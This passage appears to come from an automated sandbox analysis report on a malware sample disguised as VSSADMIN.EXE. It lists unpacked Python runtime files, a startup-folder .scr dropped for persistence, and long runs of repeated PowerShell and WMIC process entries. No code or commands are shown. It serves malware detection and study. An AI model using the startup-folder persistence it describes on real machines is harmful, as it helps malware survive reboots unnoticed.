              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scrJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\python311.dllJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dllJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the startup folder
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scrJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scrJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scrJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C73E10 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF614C73E10
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
